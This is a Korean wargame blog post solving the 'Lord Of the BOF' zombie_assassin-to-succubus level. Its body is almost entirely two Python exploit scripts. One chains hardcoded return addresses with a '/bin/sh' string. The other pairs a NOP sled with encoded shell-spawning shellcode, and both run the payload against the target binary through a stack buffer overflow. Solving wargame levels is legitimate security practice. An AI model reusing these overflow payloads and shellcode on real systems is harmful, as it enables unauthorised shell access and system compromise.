chainning.py
import os
from struct import *
p = lambda x : pack("<L" , x)
path = '/home/zombie_assassin/succubus'
doAddress = p(0x80487ec)
gyeAddress = p(0x80487bc)
gulAddress = p(0x804878c)
yutAddress = p(0x804875c)
moAddress = p(0x8048724)
paramAddress = p(0xbffffa48)
payload = "A"*44+doAddress+gyeAddress+gulAddress+yutAddress+moAddress+"AAAA"+paramAddress+"\x2f\x62\x69\x6e"+"\x2f\x73\x68"
os.execl(path,path,payload)
retSled.py
import os
from struct import *
p = lambda x : pack("<L" , x)
path = '/home/zombie_assassin/succubus'
doAddress = p(0x80487ec)
shellAddress = p(0xbffffa14)
shellCode ="\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"
payload = "A"*44+doAddress+shellAddress+shellCode
os.execl(path,path,payload)
'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글
| [Remind] LOB nightmare -> xavius (0) | 2019.04.23 |
|---|---|
| [Remind] LOB succubus -> nightmare (0) | 2019.04.22 |
| [Remind] LOB assassin -> zombie_assassin (0) | 2019.04.19 |
| [Remind] LOB giant-> assassin (0) | 2019.04.18 |
| [Remind] LOB bugbear -> giant (0) | 2019.04.18 |
JeonYoungSin
메모 기록용 공간